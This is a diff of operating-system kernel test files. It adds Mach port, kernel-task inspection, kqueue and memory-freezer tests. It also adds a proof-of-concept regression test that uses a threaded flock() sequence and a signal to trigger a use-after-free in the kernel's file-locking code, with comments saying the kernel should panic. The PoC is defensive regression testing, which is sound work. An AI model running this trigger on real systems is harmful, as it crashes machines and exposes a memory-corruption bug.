+       mach_msg_id_t        id,
+       mach_port_t          dest,
+       mach_port_t          right,
+       mach_msg_type_name_t disp)
+{
+       struct one_port_msg msg = {
+               .header = {
+                       .msgh_remote_port = dest,
+                       .msgh_bits        = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND,
+           0, MACH_MSG_TYPE_MOVE_SEND, MACH_MSGH_BITS_COMPLEX),
+                       .msgh_id          = id,
+                       .msgh_size        = offsetof(struct one_port_msg, trailer),
+               },
+               .body = {
+                       .msgh_descriptor_count = 1,
+               },
+               .port_descriptor = {
+                       .name        = right,
+                       .disposition = disp,
+                       .type        = MACH_MSG_PORT_DESCRIPTOR,
+               },
+       };
+       kern_return_t kr;
+
+       kr = mach_msg(&msg.header, MACH_SEND_MSG | MACH_SEND_TIMEOUT,
+           msg.header.msgh_size, 0, MACH_PORT_NULL, 10000, 0);
+
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "send(%d)", id);
+}
+
+#pragma mark - basic test about right deduplication
+
+static mach_port_t
+receive_port(
+       mach_msg_id_t        expected_id,
+       mach_port_t          rcv_port,
+       mach_msg_type_name_t expected_disp)
+{
+       struct one_port_msg msg = { };
+       kern_return_t kr;
+
+       T_LOG("waiting for message %d", expected_id);
+       kr = mach_msg(&msg.header, MACH_RCV_MSG, 0,
+           sizeof(msg), rcv_port, 0, 0);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "receive(%d)", expected_id);
+       T_QUIET; T_ASSERT_EQ(msg.header.msgh_id, expected_id, "message id matches");
+       T_QUIET; T_ASSERT_NE(msg.header.msgh_bits & MACH_MSGH_BITS_COMPLEX, 0,
+           "message is complex");
+       T_QUIET; T_ASSERT_EQ(msg.body.msgh_descriptor_count, 1, "message has one right");
+       T_QUIET; T_ASSERT_EQ(msg.port_descriptor.disposition, expected_disp,
+           "port has right disposition");
+       return msg.port_descriptor.name;
+}
+
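+/*
+ * Behavior under test (as asserted below): when the receive right and the
+ * extra send rights for one port arrive in the server's IPC space, they are
+ * expected to coalesce under a single port name, regardless of the order in
+ * which the rights were moved.
+ */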
+T_HELPER_DECL(right_dedup_server, "right_dedup_server")
+{
+       mach_port_t svc_port = server_checkin();
+       mach_port_t ports[3];
+
+       ports[0] = receive_port(1, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       ports[1] = receive_port(2, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[2] = receive_port(3, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       T_ASSERT_EQ(ports[0], ports[1], "receive, send, send");
+       T_ASSERT_EQ(ports[0], ports[2], "receive, send, send");
+       destroy_port(ports[0], true, 2);
+
+       ports[0] = receive_port(4, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[1] = receive_port(5, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       ports[2] = receive_port(6, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       T_ASSERT_EQ(ports[0], ports[1], "send, receive, send");
+       T_ASSERT_EQ(ports[0], ports[2], "send, receive, send");
+       destroy_port(ports[0], true, 2);
+
+       ports[0] = receive_port(7, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[1] = receive_port(8, svc_port, MACH_MSG_TYPE_MOVE_SEND);
+       ports[2] = receive_port(9, svc_port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       T_ASSERT_EQ(ports[0], ports[1], "send, send, receive");
+       T_ASSERT_EQ(ports[0], ports[2], "send, send, receive");
+       destroy_port(ports[0], true, 2);
+
+       T_END;
+}
+
+T_HELPER_DECL(right_dedup_client, "right_dedup_client")
+{
+       mach_port_t svc_port = server_lookup();
+       mach_port_t port;
+
+       port = make_sr_port();
+       send_port(1, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       send_port(2, svc_port, port, MACH_MSG_TYPE_COPY_SEND);
+       send_port(3, svc_port, port, MACH_MSG_TYPE_MOVE_SEND);
+
+       port = make_sr_port();
+       send_port(4, svc_port, port, MACH_MSG_TYPE_COPY_SEND);
+       send_port(5, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE);
+       send_port(6, svc_port, port, MACH_MSG_TYPE_MOVE_SEND);
+
+       port = make_sr_port();
+       send_port(7, svc_port, port, MACH_MSG_TYPE_COPY_SEND);
+       send_port(8, svc_port, port, MACH_MSG_TYPE_MOVE_SEND);
+       send_port(9, svc_port, port, MACH_MSG_TYPE_MOVE_RECEIVE);
+}
+
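+/*
+ * The server helper is assumed to be registered with launchd via the
+ * com.apple.xnu.test.mach_port.plist added later in this change (MachServices
+ * entry matching SERVICE_NAME); the client runs as a plain forked helper.
+ */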
+T_DECL(right_dedup, "make sure right deduplication works")
+{
+       dt_helper_t helpers[] = {
+               dt_launchd_helper_domain("com.apple.xnu.test.mach_port.plist",
+           "right_dedup_server", NULL, LAUNCH_SYSTEM_DOMAIN),
+               dt_fork_helper("right_dedup_client"),
+       };
+       dt_run_helpers(helpers, 2, 600);
+}
index 6aacdccc04aa0a52ebc58535ab9a0875dd888a80..e6de871d95104592158000b737c211d3bd05d135 100644 (file)
@@ -19,6 +19,7 @@
 #include <stdint.h>
 
 #include "ktrace_helpers.h"
+#include "test_utils.h"
 
 T_GLOBAL_META(
        T_META_NAMESPACE("xnu.ktrace"),
@@ -623,25 +624,6 @@ static const uint32_t noprocfilt_evts[EXP_KERNEL_EVENTS] = {
        BSDDBG_CODE(DBG_BSD_KDEBUG_TEST, 19),
 };
 
-static bool
-is_development_kernel(void)
-{
-       static dispatch_once_t is_development_once;
-       static bool is_development;
-
-       dispatch_once(&is_development_once, ^{
-               int dev;
-               size_t dev_size = sizeof(dev);
-
-               T_QUIET;
-               T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev,
-               &dev_size, NULL, 0), NULL);
-               is_development = (dev != 0);
-       });
-
-       return is_development;
-}
-
 static void
 expect_event(struct trace_point *tp, const char *name, unsigned int *events,
     const uint32_t *event_ids, size_t event_ids_len)
diff --git a/tests/kernel_inspection.c b/tests/kernel_inspection.c
new file mode 100644 (file)
index 0000000..6fa087d
--- /dev/null
@@ -0,0 +1,207 @@
+#ifdef T_NAMESPACE
+#undef T_NAMESPACE
+#endif
+
+#include <darwintest.h>
+
+#include <mach/host_priv.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/mach_vm.h>
+#include <mach/processor_set.h>
+#include <mach/task.h>
+#include <sys/sysctl.h>
+#include <mach_debug/ipc_info.h>
+#include <unistd.h>
+
+T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"),
+    T_META_RUN_CONCURRENTLY(true));
+
+/*
+ * Attempt to inspect kernel_task using a task_inspect_t.  Interact with the
+ * kernel in the same way top(1) and lsmp(1) do.
+ */
+
+static int found_kernel_task = 0;
+
+static void
+check_secure_kernel(void)
+{
+       int secure_kern = 0;
+       size_t secure_kern_size = sizeof(secure_kern);
+
+       T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern,
+           &secure_kern_size, NULL, 0), NULL);
+
+       if (secure_kern) {
+               T_SKIP("secure kernel: processor_set_tasks will not return kernel_task");
+       }
+}
+
+static void
+attempt_kernel_inspection(task_t task)
+{
+       pid_t pid = (pid_t)-1;
+       mach_msg_type_number_t i, count, thcnt;
+       struct task_basic_info_64 ti;
+       thread_act_array_t threads;
+
+       if (pid_for_task(task, &pid)) {
+               return;
+       }
+
+       T_QUIET; T_LOG("Checking pid %d", pid);
+
+       if (pid != 0) {
+               return;
+       }
+
+       T_LOG("found kernel_task, attempting to inspect");
+       found_kernel_task++;
+
+       count = TASK_BASIC_INFO_64_COUNT;
+       T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti,
+           &count), "task_info(... TASK_BASIC_INFO_64 ...)");
+
+       T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads");
+       T_LOG("Found %d kernel threads.", thcnt);
+       for (i = 0; i < thcnt; i++) {
+               kern_return_t kr;
+               thread_basic_info_data_t basic_info;
+               mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT;
+
+               kr = thread_info(threads[i], THREAD_BASIC_INFO,
+                   (thread_info_t)&basic_info, &bi_count);
+               /*
+                * Ignore threads that have gone away.
+                */
+               if (kr == MACH_SEND_INVALID_DEST) {
+                       T_LOG("ignoring thread that has been destroyed");
+                       continue;
+               }
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_info(... THREAD_BASIC_INFO ...)");
+
+               /* Now try out READ (skip eval) interfaces on kernel thread */
+               mach_msg_type_number_t msk_count = EXC_TYPES_COUNT;
+               exception_mask_t masks[EXC_TYPES_COUNT];
+               ipc_info_port_t ports_info[EXC_TYPES_COUNT];
+               exception_behavior_t behaviors[EXC_TYPES_COUNT];
+               thread_state_flavor_t flavors[EXC_TYPES_COUNT];
+               kr = thread_get_exception_ports_info(threads[i], EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors);
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "thread_get_exception_ports_info() on kernel thread: 0x%x", kr);
+
+               /* READ (with eval) interfaces should fail */
+               mach_port_t voucher;
+               kr = thread_get_mach_voucher(threads[i], 0, &voucher);
+               T_QUIET; T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "thread_get_mach_voucher() should fail with KERN_INVALID_ARGUMENT");
+
+               (void)mach_port_deallocate(mach_task_self(), threads[i]);
+       }
+       mach_vm_deallocate(mach_task_self(),
+           (mach_vm_address_t)(uintptr_t)threads,
+           thcnt * sizeof(*threads));
+
+       ipc_info_space_basic_t basic_info;
+       T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info");
+
+       ipc_info_space_t info_space;
+       ipc_info_name_array_t table;
+       ipc_info_tree_name_array_t tree;
+       mach_msg_type_number_t tblcnt = 0, treecnt = 0;
+       T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table,
+           &tblcnt, &tree, &treecnt), "mach_port_space_info");
+       if (tblcnt > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)table,
+                   tblcnt * sizeof(*table));
+       }
+       if (treecnt > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)tree,
+                   treecnt * sizeof(*tree));
+       }
+
+       /* Now try out READ (skip eval) interfaces on kernel task */
+       mach_msg_type_number_t msk_count = EXC_TYPES_COUNT;
+       exception_mask_t masks[EXC_TYPES_COUNT];
+       ipc_info_port_t ports_info[EXC_TYPES_COUNT];
+       exception_behavior_t behaviors[EXC_TYPES_COUNT];
+       thread_state_flavor_t flavors[EXC_TYPES_COUNT];
+       kern_return_t kr = task_get_exception_ports_info(task, EXC_MASK_ALL, masks, &msk_count, ports_info, behaviors, flavors);
+       T_EXPECT_MACH_SUCCESS(kr, "task_get_exception_ports_info() on kernel_task: 0x%x", kr);
+
+       /* READ (with eval) interfaces should fail */
+       vm_offset_t data;
+       mach_msg_type_number_t cnt;
+       mach_vm_address_t addr = 0x10000000; /* can be whatever, the call should fail before getting to VM */
+
+       kr = mach_vm_read(task, (mach_vm_address_t)addr, 8, &data, &cnt);
+       T_EXPECT_EQ(kr, KERN_INVALID_ARGUMENT, "mach_vm_read() should fail with KERN_INVALID_ARGUMENT");
+
+       mach_port_t voucher;
+       kr = task_get_mach_voucher(task, 0, &voucher);
+       T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_get_mach_voucher() should fail with KERN_INVALID_TASK");
+
+       /* Control interfaces should absolutely fail */
+       kr = task_set_mach_voucher(task, mach_task_self()); /* voucher arg is unused, can be whatever port */
+       T_EXPECT_EQ(kr, KERN_INVALID_TASK, "task_set_mach_voucher() should fail with KERN_INVALID_TASK");
+}
+
+T_DECL(inspect_kernel_task,
+    "ensure that kernel task can be inspected",
+    T_META_CHECK_LEAKS(false),
+    T_META_ASROOT(true))
+{
+       processor_set_name_array_t psets;
+       processor_set_t pset;
+       task_array_t tasks;
+       mach_msg_type_number_t i, j, tcnt, pcnt = 0;
+       mach_port_t self = mach_host_self();
+
+       check_secure_kernel();
+
+       T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt),
+           NULL);
+
+       for (i = 0; i < pcnt; i++) {
+               T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL);
+               T_LOG("Checking pset %d/%d", i, pcnt - 1);
+
+               tcnt = 0;
+               T_LOG("Attempting kernel inspection with control port...");
+               T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL);
+
+               for (j = 0; j < tcnt; j++) {
+                       attempt_kernel_inspection(tasks[j]);
+                       mach_port_deallocate(self, tasks[j]);
+               }
+
+               /* free tasks array */
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)tasks,
+                   tcnt * sizeof(*tasks));
+
+               T_LOG("Attempting kernel inspection with read port...");
+               T_ASSERT_MACH_SUCCESS(processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt), NULL);
+
+               for (j = 0; j < tcnt; j++) {
+                       attempt_kernel_inspection(tasks[j]);
+                       mach_port_deallocate(self, tasks[j]);
+               }
+
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)(uintptr_t)tasks,
+                   tcnt * sizeof(*tasks));
+
+               mach_port_deallocate(mach_task_self(), pset);
+               mach_port_deallocate(mach_task_self(), psets[i]);
+       }
+       mach_vm_deallocate(mach_task_self(),
+           (mach_vm_address_t)(uintptr_t)psets,
+           pcnt * sizeof(*psets));
+
+       if (found_kernel_task != 2) {
+               /* One for kernel control port test, one for kernel read port test. */
+               T_FAIL("could not find kernel_task in list of tasks returned");
+       }
+}
index 6293e16c82556cc56bc837cd14f3c07fb46f83a5..504b074d8f4184a467329f1e2732c8726b39aebb 100644 (file)
@@ -534,6 +534,7 @@ execute_test(test_t *test)
                                if ((filefd = open(test->t_watchfile, O_RDONLY | O_SYMLINK)) == -1) {
                                        T_LOG("open() of watchfile %s failed: %d (%s)\n", test->t_watchfile,
                                            errno, strerror(errno));
+                                       res = -1;
                                }
                        }
 
@@ -610,9 +611,6 @@ execute_test(test_t *test)
                                if (test->t_file_is_fifo) {
                                        close(writefd);
                                }
-                       } else {
-                               T_LOG("Couldn't open test file %s to monitor: %d (%s)\n", test->t_watchfile);
-                               res = -1;
                        }
                        if (!test->t_is_poll_test) {
                                close(kqfd);
diff --git a/tests/launchd_plists/com.apple.xnu.test.mach_port.plist b/tests/launchd_plists/com.apple.xnu.test.mach_port.plist
new file mode 100644 (file)
index 0000000..d76f2a5
--- /dev/null
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>MachServices</key>
+       <dict>
+               <key>com.apple.xnu.test.mach_port</key>
+               <dict>
+                       <key>ResetAtClose</key>
+                       <true/>
+               </dict>
+       </dict>
+       <key>ThrottleInterval</key>
+       <integer>1</integer>
+       <key>UserName</key>
+       <string>root</string>
+       <key>ProcessType</key>
+       <string>Adaptive</string>
+       <key>EnvironmentVariables</key>
+       <dict>
+               <key>MallocNanoZone</key>
+               <string>1</string>
+       </dict>
+       <key>LaunchOnlyOnce</key>
+       <true/>
+</dict>
+</plist>
diff --git a/tests/lockf_uaf_poc/README b/tests/lockf_uaf_poc/README
new file mode 100644 (file)
index 0000000..0686e71
--- /dev/null
@@ -0,0 +1,5 @@
+This Proof-of-Concept (PoC) is based on code from a security researcher
+(see rdar://70587638), and should not be used for any purpose other than
+this test.  In particular, this should not be used in other shipping
+code or as reference material to create shipping code without first checking
+with Apple Legal.
diff --git a/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c b/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c
new file mode 100644 (file)
index 0000000..9030656
--- /dev/null
@@ -0,0 +1,198 @@
+#include <fcntl.h>
+#include <pthread.h>
+#include <signal.h>
+#include <sys/fcntl.h>
+#include <unistd.h>
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+#define TMP_FILE_NAME "lockf_uaf_poc_70587638"
+
+static int fd0, fd1, fd2;
+
+static int other_failure = 0;
+static int other_failure_line = 0;
+
+static pthread_t thr0, thr1, thr2;
+
+#define RECORD_ERROR(err) do {                  \
+       if (other_failure_line == 0) {          \
+               other_failure = (err);          \
+               other_failure_line = __LINE__;  \
+       }                                       \
+} while (0)
+#define MYCHECK_ERRNO(res) do {                 \
+       if ((res) < 0) {                        \
+               RECORD_ERROR((errno));          \
+               return NULL;                    \
+       }                                       \
+} while (0)
+#define MYCHECK_POSIX(res) do {                 \
+       if ((res) != 0) {                       \
+               RECORD_ERROR((res));            \
+               return NULL;                    \
+       }                                       \
+} while (0)
+
+#define CHECK_OTHER_FAILURE() do {                      \
+       int my_other_failure = other_failure;           \
+       int my_other_failure_line = other_failure_line; \
+       other_failure_line = 0; /* reset for the next check */ \
+       T_QUIET;                                        \
+       T_ASSERT_EQ(my_other_failure_line, 0,           \
+           "Other failure %d at line %d",              \
+           my_other_failure, my_other_failure_line);   \
+} while (0)
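+
+/*
+ * Worker threads record the first failure they hit through RECORD_ERROR()
+ * (via MYCHECK_ERRNO/MYCHECK_POSIX) instead of asserting directly; the main
+ * thread then surfaces it with CHECK_OTHER_FAILURE() after each join, as in:
+ *
+ *     res = pthread_join(thr0, NULL);
+ *     T_ASSERT_POSIX_ZERO(res, "pthread_join thread 0");
+ *     CHECK_OTHER_FAILURE();
+ */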
+
+static void *
+thr2_func(void *arg)
+{
+       int res;
+
+       /*
+        * Wait for thr1 to block while attempting to acquire lock C. See the comment at the top of
+        * `thr1_func` for the reason why sleep is used.
+        */
+       (void) sleep(1u);
+
+       /*
+        * Acquire another shared lock (lock D) on the file. At this point the file has acquired 2
+        * locks; lock A and D which are both shared locks. It also has 2 exclusive locks currently
+        * blocking on lock A attempting to be acquired; lock B and C.
+        */
+       res = flock(fd2, LOCK_SH);
+       MYCHECK_ERRNO(res);
+
+       /*
+        * Unlock lock A, this will cause the first lock blocking on lock A to be unblocked (lock B)
+        * and all other locks blocking on it to be moved to blocking on the first blocked lock
+        * (lock C will now be blocking on lock B). Lock B's thread will be woken up resulting in it
+        * trying to re-acquire the lock on the file, as lock D is on the same file descriptor and
+        * already acquired on the file it will be promoted to an exclusive lock and B will be freed
+        * instead. At this point all locks blocking on lock B (lock C in this case) will now have a
+        * reference to a freed allocation.
+        */
+       res = flock(fd0, LOCK_UN);
+       MYCHECK_ERRNO(res);
+
+       return arg;
+}
+
+static void *
+thr1_func(void *arg)
+{
+       int res;
+       /*
+        * Wait for thr0 to block while attempting to acquire lock B. Sleeping isn't ideal because
+        * it doesn't prove the thread is actually blocked, but there is no easy way to detect a
+        * blocked thread programmatically, and a 1 second sleep has never failed in testing so far,
+        * so that is what is done for now.
+        */
+       (void) sleep(1u);
+
+       // Another thread is required, spawn it now before blocking
+       res = pthread_create(&thr2, 0, thr2_func, 0);
+       MYCHECK_POSIX(res);
+
+       // Block attempting to acquire an exclusive lock - lock C
+       res = flock(fd1, LOCK_EX);
+       MYCHECK_ERRNO(res);
+
+       return arg;
+}
+
+static void *
+thr0_func(void *arg)
+{
+       int res;
+
+       // Acquire a shared lock - lock A
+       res = flock(fd0, LOCK_SH);
+       MYCHECK_ERRNO(res);
+
+       // Another thread is required, spawn it now before blocking
+       res = pthread_create(&thr1, 0, thr1_func, 0);
+       MYCHECK_POSIX(res);
+
+       // Block attempting to acquire an exclusive lock - lock B
+       res = flock(fd2, LOCK_EX);
+       MYCHECK_ERRNO(res);
+
+       return arg;
+}
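+
+/*
+ * Overall sequence (summarizing the comments above; all locks are flock()s
+ * taken on the same underlying file):
+ *
+ *   thr0: LOCK_SH on fd0 (lock A), then blocks in LOCK_EX on fd2 (lock B)
+ *   thr1: blocks in LOCK_EX on fd1 (lock C)
+ *   thr2: LOCK_SH on fd2 (lock D), then LOCK_UN on fd0 (unlocks A)
+ *
+ * Unlocking A wakes B; because D is already held on the same file descriptor,
+ * D is promoted to exclusive and B is freed, leaving C blocked on freed memory.
+ */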
+
+static void
+sigpipe_handler(int sig __unused, siginfo_t *sa __unused, void *ign __unused)
+{
+       return;
+}
+
+T_DECL(lockf_uaf_poc_70587638,
+    "Do a sequence which caused lf_setlock() to free something still in-use.",
+    T_META_ASROOT(true), T_META_CHECK_LEAKS(false))
+{
+       int res;
+       struct sigaction sa;
+
+       T_SETUPBEGIN;
+
+       (void) sigfillset(&sa.sa_mask);
+       sa.sa_sigaction = sigpipe_handler;
+       sa.sa_flags = SA_SIGINFO;
+       T_ASSERT_POSIX_SUCCESS(sigaction(SIGPIPE, &sa, NULL), "sigaction(SIGPIPE)");
+
+       // Setup all the file descriptors needed (fd0's open makes sure the file exists)
+       T_ASSERT_POSIX_SUCCESS(
+               fd0 = open(TMP_FILE_NAME, O_RDONLY | O_CREAT, 0666),
+               "open(\""TMP_FILE_NAME"\", O_RDONLY|O_CREAT, 0666)");
+       T_ASSERT_POSIX_SUCCESS(
+               fd1 = open(TMP_FILE_NAME, O_RDONLY, 0666),
+               "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)");
+       T_ASSERT_POSIX_SUCCESS(
+               fd2 = open(TMP_FILE_NAME, O_RDONLY, 0666),
+               "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)");
+       T_SETUPEND;
+
+       /*
+        * Threads are used because acquiring a lock blocks the calling thread whenever a conflicting
+        * lock already exists on the file. Using multiple threads allows several lock requests to be
+        * blocked on the same file at once.
+        */
+       res = pthread_create(&thr0, 0, thr0_func, 0);
+       T_ASSERT_POSIX_ZERO(res, "pthread_create thread 0");
+
+       /*
+        * Wait for lock B to be acquired which under the hood actually results in lock D being
+        * promoted to an exclusive lock and lock B being freed. At this point the bug has been
+        * triggered leaving lock C with a dangling pointer to lock B.
+        */
+       res = pthread_join(thr0, NULL);
+       T_ASSERT_POSIX_ZERO(res, "pthread_join thread 0");
+
+       CHECK_OTHER_FAILURE();
+
+       // Trigger a signal to wake lock C from sleep causing it to do a UAF access on lock B
+       res = pthread_kill(thr1, SIGPIPE);
+       T_ASSERT_POSIX_ZERO(res, "pthread_kill thread 1");
+
+       CHECK_OTHER_FAILURE();
+
+       /*
+        * The kernel should panic at this point. This join just prevents the
+        * application from exiting before lock C's thread has woken from the
+        * signal. Exiting wouldn't be a problem in itself, but it closes all
+        * the file descriptors, which in turn unlocks the locks. That shouldn't
+        * stop the PoC from working, but it's cleaner to wait here for the
+        * kernel to panic than to exit the process.
+        */
+       res = pthread_join(thr1, NULL);
+       T_ASSERT_POSIX_ZERO(res, "pthread_join thread 1");
+
+       CHECK_OTHER_FAILURE();
+
+       T_PASS("lockf_uaf_poc_70587638");
+}
index 0e1e51ad6a19e457619d76780ac2deceb591e849..eeffaf9edbda1b34b9dfff8d6625da3ca38d8448 100644 (file)
@@ -1,5 +1,6 @@
 #include <stdio.h>
 #include <signal.h>
+#include <sys/proc.h>
 #include <sys/sysctl.h>
 #include <sys/kern_memorystatus.h>
 #include <sys/kern_memorystatus_freeze.h>
@@ -553,6 +554,7 @@ launch_background_helper(const char* variant)
        pid_t pid;
        char **launch_tool_args;
        char testpath[PATH_MAX];
+       char *variant_cpy = strdup(variant);
        uint32_t testpath_buf_size;
        int ret;
 
@@ -562,7 +564,7 @@ launch_background_helper(const char* variant)
        launch_tool_args = (char *[]){
                testpath,
                "-n",
-               variant,
+               variant_cpy,
                NULL
        };
        ret = dt_launch_tool(&pid, launch_tool_args, false, NULL, NULL);
@@ -573,6 +575,7 @@ launch_background_helper(const char* variant)
        /* Set the process's managed bit, so that the kernel treats this process like an app instead of a sysproc. */
        ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_MANAGED, pid, 1, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "memorystatus_control");
+       free(variant_cpy);
        return pid;
 }
 
@@ -608,7 +611,7 @@ memorystatus_assertion_test_demote_frozen()
        /* these values will remain fixed during testing */
        int             active_limit_mb = 15;   /* arbitrary */
        int             inactive_limit_mb = 7;  /* arbitrary */
-       int             demote_value = 1;
+       __block int             demote_value = 1;
        /* Launch the child process, and elevate its priority */
        int requestedpriority;
        dispatch_source_t ds_signal, ds_exit;
@@ -729,20 +732,20 @@ is_proc_in_frozen_list(pid_t pid, char* name, size_t name_len)
 }
 
 static void
-drop_jetsam_snapshot_ownership(void)
+unset_testing_pid(void)
 {
        int ret;
-       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP, NULL, 0);
+       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_UNSET_TESTING_PID, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, 0, "Drop ownership of jetsam snapshot");
 }
 
 static void
-take_jetsam_snapshot_ownership(void)
+set_testing_pid(void)
 {
        int ret;
-       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP, NULL, 0);
+       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_SET_TESTING_PID, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "Take ownership of jetsam snapshot");
-       T_ATEND(drop_jetsam_snapshot_ownership);
+       T_ATEND(unset_testing_pid);
 }
 
 /*
@@ -809,6 +812,17 @@ get_jetsam_snapshot_entry(memorystatus_jetsam_snapshot_t *snapshot, pid_t pid)
        return NULL;
 }
 
+static dispatch_source_t
+run_block_after_signal(int sig, dispatch_block_t block)
+{
+       dispatch_source_t ds_signal;
+       signal(sig, SIG_IGN);
+       ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, (uintptr_t) sig, 0, dispatch_get_main_queue());
+       T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create");
+       dispatch_source_set_event_handler(ds_signal, block);
+       return ds_signal;
+}
+
 /*
  * Launches the child & runs the given block after the child signals.
  * If exit_with_child is true, the test will exit when the child exits.
@@ -818,11 +832,7 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant,
 {
        dispatch_source_t ds_signal, ds_exit;
 
-       /* Run the test block after the child launches & signals it's ready. */
-       signal(SIGUSR1, SIG_IGN);
-       ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue());
-       T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create");
-       dispatch_source_set_event_handler(ds_signal, test_block);
+       ds_signal = run_block_after_signal(SIGUSR1, test_block);
        /* Launch the child process. */
        child_pid = launch_background_helper(variant);
        /* Listen for exit. */
@@ -843,7 +853,6 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant,
                dispatch_activate(ds_exit);
        }
        dispatch_activate(ds_signal);
-       dispatch_main();
 }
 
 T_DECL(get_frozen_procs, "List processes in the freezer") {
@@ -862,6 +871,7 @@ T_DECL(get_frozen_procs, "List processes in the freezer") {
                T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process");
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting") {
@@ -897,11 +907,12 @@ T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting
                T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process");
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") {
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -920,11 +931,12 @@ T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") {
                free(snapshot);
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") {
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -948,12 +960,13 @@ T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") {
                free(snapshot);
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snapshot") {
        skip_if_freezer_is_disabled();
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -975,12 +988,13 @@ T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snaps
                free(snapshot);
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot_thaw_state, "Thaw count is recorded in freezer snapshot") {
        skip_if_freezer_is_disabled();
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
